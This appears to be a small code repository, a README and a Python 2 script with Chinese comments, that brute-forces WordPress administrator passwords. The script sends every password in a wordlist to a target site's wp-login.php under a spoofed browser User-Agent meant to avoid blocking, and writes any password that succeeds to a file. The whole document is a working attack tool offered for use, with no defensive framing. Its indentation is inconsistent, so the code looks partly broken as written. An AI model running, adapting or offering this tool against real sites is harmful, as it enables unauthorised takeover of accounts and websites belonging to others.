├── README.md
└── crash_wordpress.py


/README.md:
--------------------------------------------------------------------------------
1 | # crashWordpressPassword
2 | # 使用python破解wordpress后台登陆密码


--------------------------------------------------------------------------------
/crash_wordpress.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | # 破解wordpress 后台用户密码
 3 | import urllib, urllib2, time, re, cookielib,sys
 4 | 
 5 | 
 6 | class wordpress():
 7 |     def __init__(self, host, username):
 8 | 		#初始化定义 header ，避免被服务器屏蔽
 9 |         self.username = username
10 |         self.http="http://"+host
11 |         self.url =  self.http + "/wp-login.php"
12 |         self.redirect = self.http + "/wp-admin/"
13 |         self.user_agent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'
14 |         self.referer=self.http+"/wp-login.php"
15 |         self.cook="wordpress_test_cookie=WP+Cookie+check"
16 |         self.host=host
17 |         self.headers = {'User-Agent': self.user_agent,"Cookie":self.cook,"Referer":self.referer,"Host":self.host}
18 |         self.cookie = cookielib.CookieJar()
19 |         self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
20 | 
21 | 
22 |     def crash(self, filename):
23 |         try:
24 |             pwd = open(filename, 'r')
25 | 			#读取密码文件，密码文件中密码越多破解的概率越大
26 |             while 1 :
27 |                 i=pwd.readline()
28 |                 if not i :
29 |                     break
30 | 
31 |                 data = urllib.urlencode(
32 |                     {"log": self.username, "pwd": i.strip(), "testcookie": "1", "redirect_to": self.redirect})
33 |                 Req = urllib2.Request(url=self.url, data=data, headers=self.headers)
34 | 				#构造好数据包之后提交给wordpress网站后台
35 |                 Resp = urllib2.urlopen(Req)
36 |                 result = Resp.read()
37 |                 # print result
38 |                 login = re.search(r'login_error', result)
39 | 				#判断返回来的字符串，如果有login error说明失败了。
40 |                 if login:
41 |                     pass
42 |                 else:
43 |                     print "Crashed! password is %s %s" % (self.username,i.strip())
44 |                     g=open("wordpress.txt",'w+')
45 |                     g.write("Crashed! password is %s %s" % (self.username,i.strip()))
46 |                     pwd.close()
47 |                     g.close()
48 | 					#如果匹配到密码， 则这次任务完成，退出程序
49 |                     exit()
50 |                     break
51 | 
52 |             pwd.close()
53 | 
54 | 			except Exception, e:
55 |             print "error"
56 |             print e
57 |             print "Error in reading password"
58 | 
59 | 
60 | if __name__ == "__main__":
61 |     print "begin at " + time.ctime()
62 |     host=sys.argv[1]
63 |     #url = "http://"+host
64 | 	#给程序提供参数，为你要破解的网址
65 |     user = sys.argv[2]
66 |     dictfile=sys.argv[3]
67 | 	#提供你事先准备好的密码文件
68 |     obj = wordpress(host, user)
69 |     #obj.check(dictfile)
70 |     obj.crash(dictfile)
71 |     #obj.crash_v()
72 |     print "end at " + time.ctime()
73 | 
74 | 


--------------------------------------------------------------------------------